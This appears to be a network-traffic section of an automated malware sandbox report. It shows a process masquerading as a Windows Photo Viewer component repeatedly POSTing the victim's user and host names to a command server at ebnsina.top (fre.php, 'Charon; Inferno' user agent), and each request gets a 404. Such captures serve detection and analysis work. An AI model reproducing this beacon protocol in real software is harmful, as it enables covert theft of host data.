Apr 3, 2024 06:38:49.746107101 CEST	80	49846	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.746213913 CEST	49846	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.748493910 CEST	49846	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.873267889 CEST	80	49846	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:49.873338938 CEST	49846	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:49.998516083 CEST	80	49846	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.168106079 CEST	80	49846	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.168381929 CEST	49846	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.168560982 CEST	80	49846	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.168627977 CEST	49846	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.294941902 CEST	80	49846	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.310019016 CEST	49847	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.434672117 CEST	80	49847	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.434798956 CEST	49847	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.437190056 CEST	49847	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.561937094 CEST	80	49847	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.562014103 CEST	49847	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.686773062 CEST	80	49847	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.856304884 CEST	80	49847	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.856564999 CEST	80	49847	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.856631041 CEST	49847	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.858866930 CEST	49847	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:50.984102964 CEST	80	49847	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:50.996572018 CEST	49848	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.120830059 CEST	80	49848	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.121057987 CEST	49848	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.126317978 CEST	49848	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.250298023 CEST	80	49848	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.250366926 CEST	49848	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.374183893 CEST	80	49848	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.541656971 CEST	80	49848	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.541742086 CEST	80	49848	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.541804075 CEST	49848	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.541945934 CEST	49848	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.665857077 CEST	80	49848	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.686769009 CEST	49849	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.811446905 CEST	80	49849	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.811542988 CEST	49849	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.813477993 CEST	49849	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:51.937983990 CEST	80	49849	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:51.938059092 CEST	49849	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:52.064783096 CEST	80	49849	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:52.373929024 CEST	80	49849	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:52.374150038 CEST	49849	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:52.374557018 CEST	80	49849	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:52.374608994 CEST	49849	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:52.498809099 CEST	80	49849	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:52.510831118 CEST	49850	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:52.636068106 CEST	80	49850	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:52.636172056 CEST	49850	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:52.638175011 CEST	49850	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:52.763200998 CEST	80	49850	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:52.763309002 CEST	49850	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:52.888353109 CEST	80	49850	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.062553883 CEST	80	49850	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.062717915 CEST	80	49850	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.062767982 CEST	49850	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.062807083 CEST	49850	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.187792063 CEST	80	49850	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.198067904 CEST	49851	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.322693110 CEST	80	49851	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.322835922 CEST	49851	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.324728966 CEST	49851	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.449249029 CEST	80	49851	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.449424982 CEST	49851	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.574074984 CEST	80	49851	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.752285957 CEST	80	49851	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.752572060 CEST	49851	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.753328085 CEST	80	49851	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.753379107 CEST	49851	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:53.877093077 CEST	80	49851	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:53.883661985 CEST	49852	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.007981062 CEST	80	49852	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.008066893 CEST	49852	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.009984970 CEST	49852	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.134251118 CEST	80	49852	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.134341002 CEST	49852	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.258673906 CEST	80	49852	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.573359013 CEST	80	49852	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.573605061 CEST	49852	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.573646069 CEST	80	49852	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.573693037 CEST	49852	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.698005915 CEST	80	49852	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.714946985 CEST	49853	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.840018988 CEST	80	49853	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.840145111 CEST	49853	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.842169046 CEST	49853	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:54.966985941 CEST	80	49853	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:54.967072964 CEST	49853	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.092123985 CEST	80	49853	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.256551027 CEST	80	49853	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.256692886 CEST	80	49853	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.256752968 CEST	49853	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.256951094 CEST	49853	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.381793022 CEST	80	49853	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.407073021 CEST	49854	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.531677008 CEST	80	49854	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.532332897 CEST	49854	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.534564972 CEST	49854	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.658790112 CEST	80	49854	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.660617113 CEST	49854	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.784987926 CEST	80	49854	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.956835985 CEST	80	49854	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.957307100 CEST	49854	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:55.957501888 CEST	80	49854	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:55.957564116 CEST	49854	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.081636906 CEST	80	49854	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.091351032 CEST	49855	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.215806007 CEST	80	49855	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.215900898 CEST	49855	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.219175100 CEST	49855	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.343594074 CEST	80	49855	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.343656063 CEST	49855	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.468700886 CEST	80	49855	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.647528887 CEST	80	49855	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.647773027 CEST	80	49855	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.647876024 CEST	49855	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.647983074 CEST	49855	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.772847891 CEST	80	49855	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.793962002 CEST	49856	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.918385983 CEST	80	49856	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:56.918467999 CEST	49856	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:56.921190023 CEST	49856	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:57.045996904 CEST	80	49856	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:57.046123981 CEST	49856	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:57.170444965 CEST	80	49856	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:57.483875036 CEST	80	49856	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:57.484045029 CEST	80	49856	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:57.484122992 CEST	49856	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:58.584541082 CEST	49856	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:58.709031105 CEST	80	49856	104.21.13.124	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2024 06:37:19.497356892 CEST	60521	53	192.168.2.4	1.1.1.1
Apr 3, 2024 06:37:19.622273922 CEST	53	60521	1.1.1.1	192.168.2.4
Apr 3, 2024 06:37:20.376297951 CEST	62970	53	192.168.2.4	1.1.1.1
Apr 3, 2024 06:37:20.504226923 CEST	53	62970	1.1.1.1	192.168.2.4
Apr 3, 2024 06:37:23.663933039 CEST	55811	53	192.168.2.4	1.1.1.1
Apr 3, 2024 06:37:24.090029955 CEST	53	55811	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 3, 2024 06:37:19.497356892 CEST	192.168.2.4	1.1.1.1	0x8bbc	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Apr 3, 2024 06:37:20.376297951 CEST	192.168.2.4	1.1.1.1	0x42ab	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Apr 3, 2024 06:37:23.663933039 CEST	192.168.2.4	1.1.1.1	0x1785	Standard query (0)	ebnsina.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 3, 2024 06:37:19.622273922 CEST	1.1.1.1	192.168.2.4	0x8bbc	No error (0)	drive.google.com	192.178.50.78	A (IP address)	IN (0x0001)	false
Apr 3, 2024 06:37:20.504226923 CEST	1.1.1.1	192.168.2.4	0x42ab	No error (0)	drive.usercontent.google.com	192.178.50.65	A (IP address)	IN (0x0001)	false
Apr 3, 2024 06:37:24.090029955 CEST	1.1.1.1	192.168.2.4	0x1785	No error (0)	ebnsina.top	104.21.13.124	A (IP address)	IN (0x0001)	false
Apr 3, 2024 06:37:24.090029955 CEST	1.1.1.1	192.168.2.4	0x1785	No error (0)	ebnsina.top	172.67.167.246	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

ebnsina.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:24.221116066 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 176 Connection: close
Apr 3, 2024 06:37:24.347925901 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2CtottD
Apr 3, 2024 06:37:24.779788017 CEST	621	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2nfHcAlrHEG%2FmW88PiiTIHkgmoPSyTjOGh1r7c%2FfnqlSZraYRuC2cydERUW9JuKrF4WDDCHzsd4fzB%2B9yU5QzxhpxAMfgzXUcc0Y%2BJCWNzvb%2FsIQgbAQYEg%2BQ1l6kA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65cfac81fdaf5-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:25.030663013 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 176 Connection: close
Apr 3, 2024 06:37:25.155721903 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C1cSDg
Apr 3, 2024 06:37:25.581723928 CEST	617	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pT2%2FTGyxpisxt%2Fo2U3X9HIpCT9gLZA945xqTqEftgAwqIKkEcynQdv0zAENWLpb6r5h%2FO3dLKEg%2FqmaBtDf5H26k9JffTZ3Lq8U2XLlP1fjZfQcoo11prxyYLbgmyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65cffd911741a-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:25.764698982 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:25.893218994 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:26.326467991 CEST	625	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObzLI20Bog6KZkgISlNxt8iVq74%2FGyuXpirIx%2B5jp09Lgao97LQacAISMK45fTqBGiAXwioxhXQmL5Wbyvrmlv3KQgbqnul6zWId76XCFm%2F%2FskdVlHK461rnkipCsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d046e0d9ae3-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:28.125041008 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:28.249512911 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:28.687709093 CEST	619	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGiTL8HIXsO4D7WbLLHSyBxPythHfYUsbMQEsdTVDq2g8CwrRyKIdhxVmUv%2FtMcGsFK7PzC1wg6ZqwvsHRapsxo6u0F3gKBp4TQVW3vzAm0AUdICs9fgaJHvHcEiFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d1329a49acf-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:28.952090025 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:29.076817989 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:29.510701895 CEST	617	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j9pdIVZtOxw3e5fy1kKb26IsYXkkMJTGE0k33Zz6P0NhQJexjoQClJ39EJchtuLFAVOzT9hmIJ2jAWj9N5OAmRHgVV7p5GV9DR92wTI6MJ3bnFCp9vqDU6XY3TEglw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d185adc25a0-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:29.787076950 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:29.911164045 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:30.342767000 CEST	631	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3APQNCIDj5GB2qIZRgOke%2F%2B7RdElLy56IWGKGZcyB50sPg6eeF2%2FbFxY3Q57nexBkwJNrI7vSr06gIZ0h6JQWjNAXIWk9nqJlXLYRX4K9oi0%2FcONyl%2BrhgH%2FW%2F2srA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d1d8fbc02e0-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:30.613046885 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:30.738256931 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:31.172743082 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0UYpODKtegEevWZBnpDZURaiyw57Yc3wIi%2FyPDuZE19LFdMmDBfC2NaiES%2Bvroul%2F0u4q0skdqTfZoBXvARIKksu2YtqmDU5yYTQp6LYFGZmBb9qMskfQLPbG2sANg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d22b9b274a4-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	104.21.13.124	80	7560	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Timestamp	Bytes transferred	Direction	Data
Apr 3, 2024 06:37:31.437870979 CEST	244	OUT	POST /project/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: ebnsina.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: C8BF7604 Content-Length: 149 Connection: close
Apr 3, 2024 06:37:31.562454939 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 34 00 34 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones124406JONES-PC0FDD42EE188E931437F4FBE2C
Apr 3, 2024 06:37:31.994648933 CEST	623	IN	HTTP/1.1 404 Not Found Date: Wed, 03 Apr 2024 04:37:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFWVbkMMdXEue6t7kqqJLz2vNZ6JkAX2JQaKV15UFY0I8%2BMQ%2FopOBLhUpPcxdUiJNHTEDhdpsfS3WI%2FmEJ4seDysQhmvbuiTfWaT7sEjI92oIDrrlpg3bVgzQ8VEcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86e65d27df5e4c1e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
